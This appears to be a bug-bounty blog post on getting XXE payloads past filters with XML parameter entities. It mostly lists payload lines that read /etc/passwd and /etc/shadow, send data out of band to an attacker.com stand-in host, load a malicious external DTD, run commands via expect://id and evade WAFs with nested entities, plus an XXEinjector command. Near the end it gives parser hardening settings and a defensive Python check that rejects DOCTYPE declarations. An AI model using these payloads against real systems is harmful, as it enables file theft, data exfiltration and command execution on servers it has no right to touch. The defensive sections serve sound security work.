Bypassing XXE Filters with Parameter Entities

Ever wonder why your XXE payloads are getting blocked? Standard entity declarations like:

<!ENTITY xxe SYSTEM "http://attacker-site.com/">

…are often filtered by security systems. However, parameter entities can bypass these restrictions.

You Should Know:

1. Parameter Entities vs. General Entities

General entities are what most filters match on, while parameter entities (declared with a % between ENTITY and the name, and referenced only inside the DTD) are often missed by the same filters:

<!ENTITY % param_entity SYSTEM "file:///etc/passwd"> 
%param_entity; 

2. Out-of-Band (OOB) Exploitation

Use parameter entities to exfiltrate data via DNS or HTTP (here `%file;` stands for a previously declared parameter entity holding the data):

<!ENTITY % oob_entity SYSTEM "http://attacker.com/?exfil=%file;"> 

3. Bypassing Filters with Encoding

Try hex or URL encoding of the payload:

<!ENTITY % encoded_entity SYSTEM "http://attacker.com/%3Fdata%3D"> 

4. Local File Inclusion (LFI) via XXE

Extract files using:

<!ENTITY % lfi_entity SYSTEM "file:///etc/shadow"> 

5. Blind XXE Detection

Test with DNS callbacks:

<!ENTITY % blind_entity SYSTEM "http://attacker.burpcollaborator.net"> 

6. DTD External Reference

Host a malicious DTD:

<!ENTITY % ext_dtd SYSTEM "http://attacker.com/malicious.dtd"> 
%ext_dtd; 

7. Linux/Windows Command Execution

For PHP-based apps with the `expect` extension enabled:

<!ENTITY % cmd_entity SYSTEM "expect://id"> 

8. WAF Bypass Techniques

  • Use CDATA tags to mask payloads.
  • Nested entities (the `%` of the inner declaration is written as the character reference `&#x25;`):
    <!ENTITY % nested1 "<!ENTITY &#x25; nested2 SYSTEM 'http://attacker.com/'>">

9. Automated Testing with XXEinjector

Run:

ruby XXEinjector.rb --host=attacker.com --file=payload.xml 

10. Prevention Checks

Disable external entities in XML parsers:

  • PHP: `libxml_disable_entity_loader(true);` (deprecated since PHP 8.0, where libxml no longer loads external entities by default; keep it for older runtimes)
  • Java: `setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`
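Added example, not code from the post or from any tool it names: a stdlib-only pre-parse check that refuses any request body carrying a DOCTYPE (the same effect as the disallow-doctype-decl feature above) and records which general and parameter entities the prolog tried to declare, so the attempt can be logged. Because it asks expat rather than matching raw bytes, the encoding tricks from item 3 (here a UTF-16 body) do not hide the declaration; the sample bodies are constructed from items 1 and 8.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


def inspect_xml(data: bytes) -> dict:
    """Parse without resolving anything external and report what the prolog
    declares: {"doctype": bool, "entities": [(name, is_param, system_id)]}."""
    report = {"doctype": False, "entities": []}
    parser = expat.ParserCreate()
    # Never expand %refs; in the DTD, so inspecting a body can never fetch a DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = True
        if sysid:  # <!DOCTYPE x SYSTEM "..."> is itself an external fetch
            report["entities"].append((name, False, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        report["entities"].append((name, bool(is_param), sysid))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # No ExternalEntityRefHandler is set, so an &ext; in content is skipped.
    parser.Parse(data, True)
    return report


def safe_parse(data: bytes) -> ET.Element:
    """Reject any document that carries a DOCTYPE, then parse the rest."""
    report = inspect_xml(data)
    if report["doctype"]:
        raise ValueError(f"DOCTYPE rejected; declared: {report['entities']}")
    return ET.fromstring(data)


# Constructed request bodies modelled on items 1 and 8 of the post.
PARAM_ENTITY = (b'<?xml version="1.0"?><!DOCTYPE data [\n'
                b'<!ENTITY % param_entity SYSTEM "file:///etc/passwd">\n'
                b'%param_entity;\n]><data>x</data>')
NESTED = (b'<!DOCTYPE data [<!ENTITY % nested1 '
          b'"<!ENTITY &#x25; nested2 SYSTEM \'http://attacker.com/\'>">'
          b'%nested1;]><data>x</data>')
CLEAN = b'<data>x</data>'

if __name__ == "__main__":
    # The UTF-16 copy shows why a byte-level regex for "<!DOCTYPE" is not enough.
    for body in (PARAM_ENTITY, NESTED, PARAM_ENTITY.decode().encode("utf-16"), CLEAN):
        print(inspect_xml(body))
```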

What Undercode Say

XXE remains a critical attack vector due to misconfigured XML parsers. Always test for:
– DTD processing in APIs (SOAP, REST).
– Server-side request forgery (SSRF) via external entities.
– File disclosure (for example file:///proc/self/environ) and access to cloud metadata endpoints.
– Error-based XXE when OOB fails.

Use tools like Burp Suite, XXEinjector, and OOB-Server for detection.

Expected Output:

A successful XXE exploit exfiltrates sensitive data or executes remote commands. Always validate inputs and disable unnecessary XML features in production.

Reported By: Amitkumar711 Bugbounty – Hackers Feeds